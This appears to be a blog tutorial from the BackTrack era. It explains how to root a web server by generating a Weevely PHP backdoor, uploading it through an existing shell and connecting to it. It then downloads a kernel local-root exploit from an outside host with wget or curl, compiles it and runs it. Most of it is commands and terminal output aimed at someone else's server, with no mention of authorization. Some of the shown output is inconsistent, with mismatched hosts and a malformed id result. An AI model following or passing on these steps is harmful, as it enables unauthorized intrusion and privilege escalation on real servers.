Today I'm going to show you how to R00t a server with Weevely in BackTrack.
First of all open Weevely:
Menu > BacTrack > Maintaining Access > Web Backdoors > Weevely
Or
Open Terminal and type:
root@root: cd /pentest/backdoor/web/weevely
############################################################
Now lets make our backdoor by typing:
root@root:./main.py -g -o /root/Desktop/backdoor.php -p password
by typing this command, we made a backdoor called 'backdoor.php' with the password: 'password'
++++++++++++++++++++++Commands We Need++++++++++++++++++++++++++
-g = Generate backdoor
-o = Output
-p = Password
-u = URL
-t = start Terminal session
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Steps:
Uploading our backdoor & connecting to it.
Checking the Kernel & Finding LocalR00t for it.
Compiling The LocalR00t
Executing..
###########################################################################
Lets start:
Open your shell and upload the backdoor:
The link to the backdoor will be the same as shell: For Example:
http://www.target.com/uploads/shell.php <== shell
http://www.target.com/uploads/backdoor.php <== backdoor
Connect to the backdoor by typing:
./main.py -t -u http://www.target.com/uploads/backdoor.php -p password
root@root:/pentest/backdoors/web/weevely# ./main.py -t -u http://www.target.com/backdoor.php -p password
Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright © 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
+ Using method 'system()'.
+ Retrieving terminal basic environment variables .
[hacker@target.com/]
Now to find the kernel version type:
uname -a
[hacker@target.com/] uname -a
2.6.18 (example)
Now we have to find the localroot for that kernel in :
http://www.1337day.com
http://www.exploit-db.com
http://www.google.com
and some others..
Now, we go to the directory /tmp/, coz its always writeable,
now lets say the kernel was 2.6.18
there are some ways to get the localroot:
uploading through shell
wget method
curl
Now let me explain how each method works:
ofcourse you know how to upload though the shell
wget
wget http://www.exploit.com/2.6.18.c
curl
curl http://www.exploit.com/2.6.18.c -o new_name
for this TUT we will use WGET
############################################
[hacker@target.com/tmp/]ls
file
file1
anything
[hacker@target.com/tmp/]wget http://www.exploit.com/2.6.18.c
--2012-01-29 05:43:37-- http://1337day.com/exploits/17158
Resolving exploitcom... 127.1.1
Connecting to exploit.com|127.1.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: `2.6.18.c'
0K ......... 208M=0s
2012-01-29 05:43:38 (208 MB/s) - `2.6.18.c' saved [9396]
[hacker@target.com/tmp/]ls
2.6.18.c
file
file1
anything
#############################################
ok, now the exploit is on the server, we have to compile it by this command:
gcc 2.6.18.c -o zombie
[hacker@target.com/tmp/]gcc 2.6.18.c -o zombie
[hacker@target.com/tmp/]ls
2.6.18.c
file
file1
anything
zombie
++++++++++++++++
chmod 777 zombie
++++++++++++++++
[hacker@target.com/tmp/]chmod 777 zombie
++++++++++++++++
executing..
++++++++++++++++
[hacker@target.com/tmp/]./zombie
.
.
.
.
.
done!
[hacker@target.com/tmp/]id
uid=(root) gid=(root)
R00ted!
Hope you like it!
Post a Comment